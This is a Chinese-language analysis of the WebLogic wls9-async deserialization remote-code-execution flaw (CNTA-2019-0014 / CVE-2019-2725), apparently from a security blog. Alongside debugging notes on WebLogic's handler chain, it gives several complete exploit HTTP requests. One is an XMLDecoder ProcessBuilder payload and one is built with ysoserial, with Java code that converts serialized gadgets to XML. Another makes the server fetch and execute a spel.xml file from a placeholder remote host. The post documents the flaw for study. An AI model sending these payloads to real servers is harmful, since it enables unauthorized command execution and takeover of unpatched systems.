CNTA-2019-0014 wls9-async 反序列化 rce 分析

在调试weblogic，以前导入jar包都是在weblogic目录搜索*.jar拷贝出来在导入IDEA.有时候会出现好多相同的jar包，调试的时候就会出问题，实际上导入以下俩个包就可以了。1、是module模块。



2、是server下的lib包



POC如下

POST /_async/AsyncResponseService HTTP/1.1
Host: 192.168.31.111:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 747

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.xmlDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>/c</string></void><void index="2"><string>calc</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

漏洞是在weblogic.wsee.async,jar包下，

那么处理流程大概也会是 async 路径下或者 wsee 路径下处理的请求包，

这时候在BaseWSServlet类下断，这个类继承HttpServlet，processerList发现对Soap处理跟进处理过程。



处理POST请求。



45行跟进



跟进分发器



62行，setHandlerChain，70行handleRequest对Handler进行处理



所有的Handler，既然是责任链调用，那么他会从 Handler 0 一直执行到 Handler 20，挨个查阅了后，发现大多是对环境的各种值做存取操作而WorkAreaServerHandler 跟入细看。









触发点

CVE-2019-2725分析

poc构造如下：

1、java -jar ysoserial.jar Jdk7u21 "需要执行的命令" > payload.txt

gadgets使用Jdk7u21

2、将payload.txt生成xml格式

public class Payload{

    public static void main(String[] args) throws Exception {

        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("payload.txt"));
        Object o = objectInputStream.readObject();

        byte[] bytes = ObjectToByte(o);

        objectXmlEncoder(bytes , "payload.xml");

    }

    private static byte[] ObjectToByte(Object obj) {
        byte[] bytes = null;
        try {
            // object to bytearray
            ByteArrayOutputStream bo = new ByteArrayOutputStream();
            ObjectOutputStream oo = new ObjectOutputStream(bo);
            oo.writeObject(obj);

            bytes = bo.toByteArray();

            bo.close();
            oo.close();
        } catch (Exception e) {
            System.out.println("translation" + e.getMessage());
            e.printStackTrace();
        }
        return bytes;
    }

    public static void objectXmlEncoder(Object obj,String fileName)
            throws FileNotFoundException,IOException,Exception
    {

        java.io.File file = new java.io.File(fileName);
        if(!file.exists()){
            file.createNewFile();
        }

        java.io.BufferedOutputStream oop = new java.io.BufferedOutputStream(new java.io.FileOutputStream(file));
        java.beans.XMLEncoder xe = new java.beans.XMLEncoder(oop);
        xe.flush();
        //写入xml
        xe.writeObject(obj);
        xe.close();
        oop.close();
    }
}

3、生成报文

POST /_async/AsyncResponseService HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
SOAPAction:
Accept: */*
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Connection: keep-alive
content-type: text/xml
Content-Length: 65684

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>
需要拼接的部分</void></class>
</java>
 </work:WorkContext>
 </soapenv:Header>
 <soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>

前面处理流程和上面分析一样，还是在WorkAreaServerHandler 跟进看，最终漏洞触发点如下:



通过FileSystemXmlApplicationContext类来构造poc:



poc如下：

POST /_async/AsyncResponseService HTTP/1.1
Host: localhost:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en,zh-CN;q=0.8,zh;q=0.7,zh-TW;q=0.5,zh-HK;q=0.3,en-US;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/xml
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 649

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">   <soapenv:Header> <wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><class><string>com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext</string><void><string>http://x.x.x.x/spel.xml</string></void></class></java>    </work:WorkContext>   </soapenv:Header>   <soapenv:Body>      <asy:onAsyncDelivery/>   </soapenv:Body></soapenv:Envelope>

spel.xml内容

<beans xmlns="http://www.springframework.org/schema/beans"
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:schemaLocation="
     http://www.springframework.org/schema/beans
     http://www.springframework.org/schema/beans/spring-beans.xsd
">
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
     <constructor-arg value="calc" />
  </bean>
</beans>

这里实例化FileSystemXmlApplicationContext这个类



调用FileSystemXmlApplicationContext的构造方法



初始化bean



调用pb bean中的方法，最终命令执行

详细分析看这篇文章：

https://mp.weixin.qq.com/s?__biz=MzUyOTc3NTQ5MA==&mid=2247484640&idx=1&sn=dad9a86e9d131f8d7e592e617f6235bb&chksm=fa5aaa0dcd2d231bc3d0e5c0394e6e47c859e1e0165cab3bbe01cecf32e0c915a8fb4e34f29d&mpshare=1&scene=1&srcid=#rd

https://www.t00ls.net/thread-51008-1-1.html

下面这篇文章写的非常详细，怎样跟一个httpServerlet生命周期。

参考链接：

https://xz.aliyun.com/t/4895

另外几条链参考畅神的：

https://balis0ng.com/post/lou-dong-fen-xi/weblogic-wls9-asynczu-jian-rcelou-dong-fen-xi